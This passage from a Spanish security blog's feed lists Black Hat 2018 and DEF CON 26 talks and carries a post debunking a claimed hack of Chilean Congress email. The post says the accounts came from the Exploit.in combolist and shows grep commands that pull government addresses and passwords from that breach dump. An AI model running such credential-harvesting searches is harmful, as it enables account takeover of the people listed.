&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=4svMU1qGods&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=111"&gt;There will be Glitches: Extracting and Analyzing Automotive Firmware Efficiently&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=cBNZNotSlQM&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=112"&gt;Legal Landmines: How Law and Policy are Rapidly Shaping Information Security&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=sEbR8fNIgN4&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=113"&gt;Blockchain Autopsies - Analyzing Ethereum Smart Contract Deaths&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=fKJ8sTi6H88&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=114"&gt;Deep Neural Networks for Hackers: Methods, Applications, and Open Source Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=Hw2HclZV2Kw&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=115"&gt;How TRITON Disrupted Safety Systems &amp;amp; Changed the Threat Landscape of Industrial Control Systems&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=2bK_rC81_Eo&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=116"&gt;A Dive in to Hyper-V Architecture &amp;amp; Vulnerabilities&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=MGuouau2AIE&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=117"&gt;KeenLab iOS Jailbreak Internals: Userland Read-Only Memory can be Dangerous&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=nehwuOld8iA&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=118"&gt;From Bot to Robot: How Abilities and Law Change with Physicality&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=emt1yf2Fg9g&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=119"&gt;Attacking Client-Side JIT Compilers&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=YPc05_L4vf8&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=120"&gt;Stress and Hacking: Understanding Cognitive Stress in Tactical Cyber Ops&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=OE82CfRLKKA&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=121"&gt;Finding Xori: Malware Analysis Triage with Automated Disassembly&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=6t50uRAxFT8&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=122"&gt;Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparent Session Hijacking&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=IanhnnTQg4M&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=123"&gt;Qualitative Look at Autonomous Peer Communication’s Impact on Organizational Phishing Detection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=GocrXUMRqEI&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=124"&gt;Measuring the Speed of the Red Queen’s Race; Adaption and Evasion in Malware&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=DzuPrntjWOs&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=125"&gt;Detecting Credential Compromise in AWS&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=FGtRHQjnLaQ&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=126"&gt;Keynote: Optimistic Dissatisfaction with the Status Quo&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;Fuente:&lt;/b&gt; &lt;a href="https://www.cyberhades.com/2018/11/18/v%C3%ADdeos-de-black-hat-usa-2018/" target="_blank"&gt;https://www.cyberhades.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ2EhEIExfJpwP4FbKOWIsZjsAkaCC1-MPQyefoxXLjbPVKbF69HrzA9Ou_iS_mdQ2S_C1TVrM4BqdXPL31_Ry-WGFbGuqLGEeYja5wGjehyRP9-IPAct23WP3-0mk02yFyo_FdxwuIbzO/s72-c/blackhat_2018.jpg" width="72"/></item><item><title>Cómo "hackearon" los correos del Congreso y Senado de Chile </title><link>http://www.blackploit.com/2018/08/como-hackearon-los-correos-del-congreso.html</link><category>Chilean Way</category><category>Hacked</category><category>Noticias</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Fri, 31 Aug 2018 18:48:00 -0300</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-5576783259141368814</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuVy7ggZRSQcBuIJ88iENACZ9GHJE3MbxbnKc_RXu_Vxz3ciBDRBb9g90ofoqhRqu4mFeZfTNpWsHY3cTuAyUExLd_BMp-PYLedczuvvXHy1qKyATLlVKwe-MVcv-bf9pTFDrhosGg3lai/s1600/hacker-boy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="380" data-original-width="728" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuVy7ggZRSQcBuIJ88iENACZ9GHJE3MbxbnKc_RXu_Vxz3ciBDRBb9g90ofoqhRqu4mFeZfTNpWsHY3cTuAyUExLd_BMp-PYLedczuvvXHy1qKyATLlVKwe-MVcv-bf9pTFDrhosGg3lai/s640/hacker-boy.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Una vez más el grupo "TheShadowBrokers" genera alarma pública en Chile y esta vez se debe a que supuestamente "hackearon" los correos del Congreso y Senado de ese país.&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio_niVJNJq7-oC4GSLAPR7ST4-eKiFVNV33MItY3cZI0Wu9iLA0RCLm5vyib8FuSUUTEyGksIhbSPk0VqecguuZpOcZ6XtncqXDkPQToZj8uXZ_a3VNh9RwYLzlYGHw43u8e-416WwsQsU/s1600/fake_hacked.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="896" data-original-width="504" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio_niVJNJq7-oC4GSLAPR7ST4-eKiFVNV33MItY3cZI0Wu9iLA0RCLm5vyib8FuSUUTEyGksIhbSPk0VqecguuZpOcZ6XtncqXDkPQToZj8uXZ_a3VNh9RwYLzlYGHw43u8e-416WwsQsU/s640/fake_hacked.jpg" width="360" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Al hacer un análisis de los datos "hackeados" se nota rápidamente que son muy pocos los correos involucrados, por tanto no fue una intrusión a los servidores de correos del Congreso o Senado.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Como ya es común, los "TheShadowBrokers" solo recopilan datos, así que al buscar los correos en &lt;a href="https://haveibeenpwned.com/" target="_blank"&gt;Have I Been Pwned&lt;/a&gt;, todos los correos había sido filtrados en otras ocasiones:&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqsVZQHwl4HAkEJ_YN8KDfMUYFg2O1XnDiU5nLDT851Wf4UMJQGEROM8RzBddPinozp5QiQVyShv1SHiY_hl23jNR1W2Oj0bvDiUGXB2K3mf_h61RPQw-jEnG5lprzUlqYZMRfAsJqV2mx/s1600/pwneds.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="816" data-original-width="950" height="548" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqsVZQHwl4HAkEJ_YN8KDfMUYFg2O1XnDiU5nLDT851Wf4UMJQGEROM8RzBddPinozp5QiQVyShv1SHiY_hl23jNR1W2Oj0bvDiUGXB2K3mf_h61RPQw-jEnG5lprzUlqYZMRfAsJqV2mx/s640/pwneds.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
De estas filtraciones la más interesante es la de &lt;i&gt;&lt;b&gt;Exploit.in&lt;/b&gt;&lt;/i&gt;, ya que esta es una recopilación tipo combolist (email:contraseña) de muchas otras filtraciones, la particularidad es que todas las contraseñas están en texto plano (fueron crackeadas por algún ruso erudito en delitos informáticos). Esa base de datos está en la red y es cosa de buscarla, al comparar los datos de esa bases de datos con los "hackeados" por los "TheShadowBrokers", BINGO! son exactamente las mismas cuentas y contraseñas.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Por tanto lo único que tuvieron que hacer es:&lt;/div&gt;
&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;grep -rnw '/ruta/a/Exploit.in_database/' -e 'congreso.cl'
grep -rnw '/ruta/a/Exploit.in_database/' -e 'senado.cl'&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Así de simple, probablemente ni si quiera hayan servido para acceder a las cuentas reales, pero si para generar alarma pública.&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;Fuentes:&lt;/b&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.fayerwayer.com/2018/08/chile-correos-congreso-hackeo/"&gt;https://www.fayerwayer.com/2018/08/chile-correos-congreso-hackeo/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.antronio.cl/threads/the-shadowbrokers-filtra-claves-de-senadores.1292187/"&gt;https://www.antronio.cl/threads/the-shadowbrokers-filtra-claves-de-senadores.1292187/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
[+] Salu2&lt;br /&gt;
&lt;br /&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuVy7ggZRSQcBuIJ88iENACZ9GHJE3MbxbnKc_RXu_Vxz3ciBDRBb9g90ofoqhRqu4mFeZfTNpWsHY3cTuAyUExLd_BMp-PYLedczuvvXHy1qKyATLlVKwe-MVcv-bf9pTFDrhosGg3lai/s72-c/hacker-boy.png" width="72"/></item><item><title>Presentaciones y Demos de la DEF CON 26 (2018)</title><link>http://www.blackploit.com/2018/08/presentaciones-y-demos-de-la-def-con-26.html</link><category>Black Hat</category><category>Conference</category><category>DEFCON</category><category>Paper</category><category>Presentaciones</category><category>Seguridad</category><category>Seguridad Web</category><category>Textos</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Tue, 14 Aug 2018 10:35:00 -0300</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-2519961365584536256</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_P01B5vIJwK5gpolgAW8oZntWueB2InFPo70q174vgeASdhSS_XTgGcC-DpUh5wEg76YrhkOtowe7LuBKcqFdPA0LDcrdYhKXzdQGklawmLpY11mK9PvPUN3wUVORMQ4YChuuEaExoiWs/s1600/def+con+26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="420" data-original-width="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_P01B5vIJwK5gpolgAW8oZntWueB2InFPo70q174vgeASdhSS_XTgGcC-DpUh5wEg76YrhkOtowe7LuBKcqFdPA0LDcrdYhKXzdQGklawmLpY11mK9PvPUN3wUVORMQ4YChuuEaExoiWs/s1600/def+con+26.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Como ya es costumbre, se llevó a cabo del 9 al 12 de agosto del 2018 la &lt;b&gt;DEF CON 26&lt;/b&gt;, conferencia que se destaca por llevar a los mejores exponentes mundiales y por ser una de las conferencias más renombradas en el mundo de la seguridad informática, hacking y pentest. Las presentaciones y demos las puedes descargar todas juntas en &lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations.rar" rel="nofollow" target="_blank"&gt;formato RAR&lt;/a&gt;, por &lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations.torrent" rel="nofollow" target="_blank"&gt;torrent&lt;/a&gt; o individualmente:&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Alexei Bulazel

&lt;ul&gt;
&lt;li&gt;Alexei-Bulazel-Reverse-Engineering-Windows-Defender-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Alexei%20Bulazel/Alexei-Bulazel-Reverse-Engineering-Windows-Defender-Demo-Videos/Alexei-Bulazel-demo-1-mpclient.mp4"&gt;Alexei-Bulazel-demo-1-mpclient.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Alexei%20Bulazel/Alexei-Bulazel-Reverse-Engineering-Windows-Defender-Demo-Videos/Alexei-Bulazel-demo-2-outputdebugstringa.mp4"&gt;Alexei-Bulazel-demo-2-outputdebugstringa.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Alexei%20Bulazel/Alexei-Bulazel-Reverse-Engineering-Windows-Defender-Demo-Videos/Alexei-Bulazel-demo-3-file-system.mp4"&gt;Alexei-Bulazel-demo-3-file-system.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Alexei%20Bulazel/Alexei-Bulazel-Reverse-Engineering-Windows-Defender-Demo-Videos/Alexei-Bulazel-demo-4-proclist.mp4"&gt;Alexei-Bulazel-demo-4-proclist.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Alexei%20Bulazel/Alexei-Bulazel-Reverse-Engineering-Windows-Defender-Demo-Videos/Alexei-Bulazel-demo-5-apicall.mp4"&gt;Alexei-Bulazel-demo-5-apicall.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Alexei%20Bulazel/Alexei-Bulazel-Reverse-Engineering-Windows-Defender-Demo-Videos/Alexei-Bulazel-demo-6-fuzz.mp4"&gt;Alexei-Bulazel-demo-6-fuzz.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Alexei%20Bulazel/Alexei-Bulazel-Reverse-Engineering-Windows-Defender.pdf"&gt;Alexei-Bulazel-Reverse-Engineering-Windows-Defender.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Alfonso Garcia and Alejo Murillo

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Alfonso-Garcia-and-Alejo-Murillo-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Alfonso%20Garcia%20and%20Alejo%20Murillo/DEFCON-26-Alfonso-Garcia-and-Alejo-Murillo-Demo-Videos/playback_tls_1.mp4"&gt;playback_tls_1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Alfonso%20Garcia%20and%20Alejo%20Murillo/DEFCON-26-Alfonso-Garcia-and-Alejo-Murillo-Demo-Videos/playback_tls_2.mp4"&gt;playback_tls_2.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Alfonso%20Garcia%20and%20Alejo%20Murillo/DEFCON-26-Alfonso-Garcia-and-Alejo-Murillo-Demo-Videos/playback_tls_3.mp4"&gt;playback_tls_3.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Alfonso%20Garcia%20and%20Alejo%20Murillo/DEFCON-26-Alfonso-Garcia-and-Alejo-Murillo-Playback-a-TLS-story-Updated.pdf"&gt;Alfonso-Garcia-and-Alejo-Murillo-Playback-a-TLS-story-Updated.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Andrea Marcelli

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Andrea%20Marcelli/DEFCON-26-Andrea-Marcelli-Demo-Video.mp4"&gt;Andrea-Marcelli-Demo-Video.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Andrea%20Marcelli/DEFCON-26-Andrea-Marcelli-Looking-for-the-perfect-signature-automatic-YARA-rules.pdf"&gt;Andrea-Marcelli-Looking-for-the-perfect-signature-automatic-YARA-rules.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Bai Zheng and Chai Wang

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Bai%20Zheng%20and%20Chai%20Wang/DEFCON-26-Bai-Zheng-Chai-Wang-You-May-Have-Paid-more-than-You-Imagine.pdf"&gt;Bai-Zheng-Chai-Wang-You-May-Have-Paid-more-than-You-Imagine.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Christopher Domas

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Christopher%20Domas/DEFCON-26-Christopher-Domas-GOD-MODE-%20UNLOCKED-hardware-backdoors-in-x86-CPUs.pdf"&gt;Christopher-Domas-GOD-MODE- UNLOCKED-hardware-backdoors-in-x86-CPUs.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Christopher%20Domas/DEFCON-26-Christopher-Domas-The-Ring-0-Facade.pdf"&gt;Christopher-Domas-The-Ring-0-Facade.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;DEFCON-26-Damien-Cauquil-Updated

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Damien-Cauquil-Extras&lt;/li&gt;
&lt;li&gt;DEFCON-26-Damien-Cauquil-Secure-Your-BLE-Devices-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Damien-Cauquil-Updated/DEFCON-26-Damien-Cauquil-Secure-Your-BLE-Devices-Demo-Videos/demo-hush.mp4"&gt;demo-hush.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Damien-Cauquil-Updated/DEFCON-26-Damien-Cauquil-Secure-Your-BLE-Devices-Demo-Videos/demo-jamming-final.mp4"&gt;demo-jamming-final.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Damien-Cauquil-Updated/DEFCON-26-Damien-Cauquil-Secure-Your-BLE-Devices-Demo-Videos/demo-sniff-active.mp4"&gt;demo-sniff-active.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Damien-Cauquil-Updated/DEFCON-26-Damien-Cauquil-Secure-Your-BLE-Devices-Demo-Videos/demo-sniff-connreq.mp4"&gt;demo-sniff-connreq.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Damien-Cauquil-Updated/DEFCON-26-Damien-Cauquil-Secure-Your-BLE-Devices-Demo-Videos/volvo-fail.gif"&gt;volvo-fail.gif&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Damien-Cauquil-Updated/DEFCON-26-Damien-Cauquil-Secure-Your-BLE-Devices-Demo-Videos/volvo-fail.mp4"&gt;volvo-fail.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON-26-Damien-Cauquil-Updated/DEFCON-26-Damien-Cauquil-Secure-Your-BLE-Devices-Updated.pdf"&gt;Damien-Cauquil-Secure-Your-BLE-Devices-Updated.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Damien Cauquil

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Damien-Cauquil-Extras&lt;/li&gt;
&lt;li&gt;DEFCON-26-Damien-Cauquil-Secure-Your-BLE-Devices-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Damien%20Cauquil/DEFCON-26-Damien-Cauquil-Secure-Your-BLE-Devices-Demo-Videos/demo-hush.mp4"&gt;demo-hush.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Damien%20Cauquil/DEFCON-26-Damien-Cauquil-Secure-Your-BLE-Devices-Demo-Videos/demo-jamming-final.mp4"&gt;demo-jamming-final.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Damien%20Cauquil/DEFCON-26-Damien-Cauquil-Secure-Your-BLE-Devices-Demo-Videos/demo-sniff-active.mp4"&gt;demo-sniff-active.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Damien%20Cauquil/DEFCON-26-Damien-Cauquil-Secure-Your-BLE-Devices-Demo-Videos/demo-sniff-connreq.mp4"&gt;demo-sniff-connreq.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Damien%20Cauquil/DEFCON-26-Damien-Cauquil-Secure-Your-BLE-Devices-Demo-Videos/volvo-fail.gif"&gt;volvo-fail.gif&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Damien%20Cauquil/DEFCON-26-Damien-Cauquil-Secure-Your-BLE-Devices-Demo-Videos/volvo-fail.mp4"&gt;volvo-fail.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Damien%20Cauquil/DEFCON-26-Damien-Cauquil-Secure-Your-BLE-Devices.pdf"&gt;Damien-Cauquil-Secure-Your-BLE-Devices.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Dan Crowley - Mauro Paredes - Jen Savage - Updated

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Dan%20Crowley%20-%20Mauro%20Paredes%20-%20Jen%20Savage%20-%20Updated/DEFCON-26-Crowley-Paredes-Savage-Outsmarting-the-Smart-City-Demo-Video.mp4"&gt;Crowley-Paredes-Savage-Outsmarting-the-Smart-City-Demo-Video.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Dan%20Crowley%20-%20Mauro%20Paredes%20-%20Jen%20Savage%20-%20Updated/DEFCON-26-Crowley-Paredes-Savage-Outsmarting-the-Smart-City-Updated.pdf"&gt;Crowley-Paredes-Savage-Outsmarting-the-Smart-City-Updated.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Daniel Zolnikov

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Daniel%20Zolnikov/DEFCON-26-Daniel-Zolnikov-Politics-and-the-Surveillence-State.pdf"&gt;Daniel-Zolnikov-Politics-and-the-Surveillence-State.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;David Melendez

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/David%20Melendez/DEFCON-26-David-Melendez-Project-Interceptor-Demo-Video.mp4"&gt;David-Melendez-Project-Interceptor-Demo-Video.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/David%20Melendez/DEFCON-26-David-Melendez-Project-Interceptor-WP.pdf"&gt;David-Melendez-Project-Interceptor-WP.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/David%20Melendez/DEFCON-26-David-Melendez-Project-Interceptor.pdf"&gt;David-Melendez-Project-Interceptor.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Dongsung Kim and Hyoung Kee Choi

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Dongsung%20Kim%20and%20Hyoung%20Kee%20Choi/DEFCON-26-Dongsung-Kim-and-Hyoung-Kee-Choi-Demo-Video.mp4"&gt;Dongsung-Kim-and-Hyoung-Kee-Choi-Demo-Video.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Dongsung%20Kim%20and%20Hyoung%20Kee%20Choi/DEFCON-26-Dongsung-Kim-and-Hyoung-Kee-Choi-Your-Watch-Can-Watch-You.pdf"&gt;Dongsung-Kim-and-Hyoung-Kee-Choi-Your-Watch-Can-Watch-You.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Dongsung Kim and Hyoung Kee Choi - Updated

&lt;ul&gt;
